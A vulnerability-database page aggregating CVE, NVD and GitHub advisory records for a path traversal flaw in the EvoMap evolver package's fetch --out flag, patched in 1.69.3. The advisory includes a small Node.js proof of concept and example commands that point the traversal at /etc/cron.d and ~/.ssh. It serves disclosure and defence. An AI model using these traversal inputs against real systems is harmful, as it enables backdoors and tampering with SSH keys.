Vulnerability-Lookup

CVE-2026-42075 (GCVE-0-2026-42075)

Vulnerability from cvelistv5 – Published: 2026-05-04 16:47 – Updated: 2026-05-04 17:15

Title

Evolver: Path Traversal via `--out` flag in `fetch` command allows Arbitrary File Write

Summary

Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3.

Severity

8.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

2 references

URL	Tags
https://github.com/EvoMap/evolver/security/adviso…	x_refsource_CONFIRM
https://github.com/EvoMap/evolver/releases/tag/v1.69.3	x_refsource_MISC

Impacted products

1 product

Vendor	Product	Version
EvoMap	evolver	Affected: < 1.69.3

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-42075",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-05-04T17:14:53.252083Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-05-04T17:15:13.381Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "evolver",
          "vendor": "EvoMap",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.69.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-05-04T16:47:23.943Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j"
        },
        {
          "name": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
        }
      ],
      "source": {
        "advisory": "GHSA-r466-rxw4-3j9j",
        "discovery": "UNKNOWN"
      },
      "title": "Evolver: Path Traversal via `--out` flag in `fetch` command allows Arbitrary File Write"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-42075",
    "datePublished": "2026-05-04T16:47:23.943Z",
    "dateReserved": "2026-04-23T19:17:30.565Z",
    "dateUpdated": "2026-05-04T17:15:13.381Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "epss": {
      "cve": "CVE-2026-42075",
      "date": "2026-05-30",
      "epss": "0.0023",
      "percentile": "0.45876"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-42075\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-04T17:16:24.283\",\"lastModified\":\"2026-05-07T15:43:39.827\",\"vulnStatus\":\"Deferred\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"}]}],\"references\":[{\"url\":\"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-42075\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-05-04T17:14:53.252083Z\"}}}], \"references\": [{\"url\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-05-04T17:15:10.300Z\"}}], \"cna\": {\"title\": \"Evolver: Path Traversal via `--out` flag in `fetch` command allows Arbitrary File Write\", \"source\": {\"advisory\": \"GHSA-r466-rxw4-3j9j\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"EvoMap\", \"product\": \"evolver\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.69.3\"}]}], \"references\": [{\"url\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j\", \"name\": \"https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\", \"name\": \"https://github.com/EvoMap/evolver/releases/tag/v1.69.3\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-04T16:47:23.943Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-42075\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-05-04T17:15:13.381Z\", \"dateReserved\": \"2026-04-23T19:17:30.565Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-04T16:47:23.943Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

FKIE_CVE-2026-42075

Vulnerability from fkie_nvd - Published: 2026-05-04 17:16 - Updated: 2026-05-07 15:43

Severity

8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/EvoMap/evolver/releases/tag/v1.69.3
	security-advisories@github.com	https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j
	134c704f-9b21-4f2e-91b3-4a467353bcc0	https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive location. This issue has been patched in version 1.69.3."
    }
  ],
  "id": "CVE-2026-42075",
  "lastModified": "2026-05-07T15:43:39.827",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-05-04T17:16:24.283",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j"
    },
    {
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-R466-RXW4-3J9J

Vulnerability from github – Published: 2026-04-22 22:06 – Updated: 2026-05-04 19:54

Summary

Evolver: Path Traversal via `--out` flag in `fetch` command allows Arbitrary File Write

Details

Summary

A path traversal vulnerability in the skill download (fetch) command allows attackers to write files to arbitrary locations on the filesystem. The --out= flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive locations.

Details

The vulnerability exists in index.js at lines 752-767:

// index.js:751-768
const outFlag = args.find(a => typeof a === 'string' && a.startsWith('--out='));
const safeId = String(data.skill_id || skillId).replace(/[^a-zA-Z0-9_\-\.]/g, '_');

// VULNERABLE: No path validation on user input
const outDir = outFlag
  ? outFlag.slice('--out='.length)  // User-controlled path
  : path.join('.', 'skills', safeId);

if (!fs.existsSync(outDir)) fs.mkdirSync(outDir, { recursive: true });

// ... downloads skill files to outDir

The outFlag.slice('--out='.length) extracts the user-provided path without any sanitization or validation. An attacker can provide paths like ../../../etc/cron.d to write files outside the intended directory.

Note: The safeId variable is sanitized via inline replacement (replace(/[^a-zA-Z0-9_\-\.]/g, '_')), but this sanitization only applies to the default path, not to the user-provided --out= path.

PoC

Prerequisites: - Node.js installed - Access to the evolver application

Steps to reproduce:

Create a test file demonstrating the vulnerability:

// test-file-write.js
const fs = require('fs');
const path = require('path');

// Simulate the vulnerable fetchSkill logic
function vulnerableFetchSkill(outFlag) {
  const outDir = outFlag
    ? outFlag.slice('--out='.length)  // No validation!
    : path.join('.', 'skills', 'default');

  console.log('Target directory:', outDir);
  console.log('Resolved path:', path.resolve(outDir));

  // In real code, this would write skill files
  const targetFile = path.join(outDir, 'skill.js');
  console.log('Would write to:', targetFile);

  return { outDir, targetFile };
}

// Test cases
console.log('=== Test 1: Normal path ===');
vulnerableFetchSkill('--out=./my-skills/test');

console.log('\n=== Test 2: Path traversal ===');
const result = vulnerableFetchSkill('--out=../../../tmp/evolver-test');

// Actually demonstrate the vulnerability
console.log('\n=== Creating directory to prove traversal works ===');
try {
  if (!fs.existsSync(result.outDir)) {
    fs.mkdirSync(result.outDir, { recursive: true });
  }
  fs.writeFileSync(
    path.join(result.outDir, 'poc.txt'),
    'Path traversal successful!\nThis file was written outside the intended directory.'
  );
  console.log('SUCCESS: File written to:', path.resolve(result.targetFile));
} catch (e) {
  console.log('Error:', e.message);
}

Run the test:

node test-file-write.js

Expected output:

=== Test 2: Path traversal ===
Target directory: ../../../tmp/evolver-test
Resolved path: /tmp/evolver-test
Would write to: ../../../tmp/evolver-test/skill.js

=== Creating directory to prove traversal works ===
SUCCESS: File written to: /tmp/evolver-test/poc.txt

Actual exploit scenario: An attacker can run:

# Write to system cron directory (requires appropriate permissions)
node index.js fetch malicious-skill --out=../../../etc/cron.d

# Or overwrite existing files
node index.js fetch existing-skill --out=../../../home/user/.ssh

Impact

This is an Arbitrary File Write vulnerability that can lead to: - Overwriting critical system files - Installing persistent backdoors (e.g., in cron directories) - Modifying SSH authorized_keys - Overwriting application code or configuration files - Privilege escalation if the process runs with elevated privileges

Affected users: Anyone using the fetch command with the --out= flag, especially in automated environments or CI/CD pipelines.

Severity

8.1 (High)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@evomap/evolver"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.69.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-42075"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T22:06:15Z",
    "nvd_published_at": "2026-05-04T17:16:24Z",
    "severity": "HIGH"
  },
  "details": "### Summary\nA path traversal vulnerability in the skill download (`fetch`) command allows attackers to write files to arbitrary locations on the filesystem. The `--out=` flag accepts user-provided paths without validation, enabling directory traversal attacks that can overwrite critical system files or create files in sensitive locations.\n\n### Details\nThe vulnerability exists in `index.js` at lines 752-767:\n\n```javascript\n// index.js:751-768\nconst outFlag = args.find(a =\u003e typeof a === \u0027string\u0027 \u0026\u0026 a.startsWith(\u0027--out=\u0027));\nconst safeId = String(data.skill_id || skillId).replace(/[^a-zA-Z0-9_\\-\\.]/g, \u0027_\u0027);\n\n// VULNERABLE: No path validation on user input\nconst outDir = outFlag\n  ? outFlag.slice(\u0027--out=\u0027.length)  // User-controlled path\n  : path.join(\u0027.\u0027, \u0027skills\u0027, safeId);\n\nif (!fs.existsSync(outDir)) fs.mkdirSync(outDir, { recursive: true });\n\n// ... downloads skill files to outDir\n```\n\nThe `outFlag.slice(\u0027--out=\u0027.length)` extracts the user-provided path without any sanitization or validation. An attacker can provide paths like `../../../etc/cron.d` to write files outside the intended directory.\n\nNote: The `safeId` variable is sanitized via inline replacement (`replace(/[^a-zA-Z0-9_\\-\\.]/g, \u0027_\u0027)`), but this sanitization only applies to the default path, not to the user-provided `--out=` path.\n\n### PoC\n\n**Prerequisites:**\n- Node.js installed\n- Access to the evolver application\n\n**Steps to reproduce:**\n\n1. Create a test file demonstrating the vulnerability:\n\n```javascript\n// test-file-write.js\nconst fs = require(\u0027fs\u0027);\nconst path = require(\u0027path\u0027);\n\n// Simulate the vulnerable fetchSkill logic\nfunction vulnerableFetchSkill(outFlag) {\n  const outDir = outFlag\n    ? outFlag.slice(\u0027--out=\u0027.length)  // No validation!\n    : path.join(\u0027.\u0027, \u0027skills\u0027, \u0027default\u0027);\n  \n  console.log(\u0027Target directory:\u0027, outDir);\n  console.log(\u0027Resolved path:\u0027, path.resolve(outDir));\n  \n  // In real code, this would write skill files\n  const targetFile = path.join(outDir, \u0027skill.js\u0027);\n  console.log(\u0027Would write to:\u0027, targetFile);\n  \n  return { outDir, targetFile };\n}\n\n// Test cases\nconsole.log(\u0027=== Test 1: Normal path ===\u0027);\nvulnerableFetchSkill(\u0027--out=./my-skills/test\u0027);\n\nconsole.log(\u0027\\n=== Test 2: Path traversal ===\u0027);\nconst result = vulnerableFetchSkill(\u0027--out=../../../tmp/evolver-test\u0027);\n\n// Actually demonstrate the vulnerability\nconsole.log(\u0027\\n=== Creating directory to prove traversal works ===\u0027);\ntry {\n  if (!fs.existsSync(result.outDir)) {\n    fs.mkdirSync(result.outDir, { recursive: true });\n  }\n  fs.writeFileSync(\n    path.join(result.outDir, \u0027poc.txt\u0027),\n    \u0027Path traversal successful!\\nThis file was written outside the intended directory.\u0027\n  );\n  console.log(\u0027SUCCESS: File written to:\u0027, path.resolve(result.targetFile));\n} catch (e) {\n  console.log(\u0027Error:\u0027, e.message);\n}\n```\n\n2. Run the test:\n```bash\nnode test-file-write.js\n```\n\n**Expected output:**\n```\n=== Test 2: Path traversal ===\nTarget directory: ../../../tmp/evolver-test\nResolved path: /tmp/evolver-test\nWould write to: ../../../tmp/evolver-test/skill.js\n\n=== Creating directory to prove traversal works ===\nSUCCESS: File written to: /tmp/evolver-test/poc.txt\n```\n\n**Actual exploit scenario:**\nAn attacker can run:\n```bash\n# Write to system cron directory (requires appropriate permissions)\nnode index.js fetch malicious-skill --out=../../../etc/cron.d\n\n# Or overwrite existing files\nnode index.js fetch existing-skill --out=../../../home/user/.ssh\n```\n\n### Impact\nThis is an **Arbitrary File Write** vulnerability that can lead to:\n- Overwriting critical system files\n- Installing persistent backdoors (e.g., in cron directories)\n- Modifying SSH authorized_keys\n- Overwriting application code or configuration files\n- Privilege escalation if the process runs with elevated privileges\n\n**Affected users:** Anyone using the `fetch` command with the `--out=` flag, especially in automated environments or CI/CD pipelines.",
  "id": "GHSA-r466-rxw4-3j9j",
  "modified": "2026-05-04T19:54:30Z",
  "published": "2026-04-22T22:06:15Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/security/advisories/GHSA-r466-rxw4-3j9j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42075"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EvoMap/evolver"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EvoMap/evolver/releases/tag/v1.69.3"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Evolver: Path Traversal via `--out` flag in `fetch` command allows Arbitrary File Write"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-42075 (GCVE-0-2026-42075)

FKIE_CVE-2026-42075

GHSA-R466-RXW4-3J9J

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature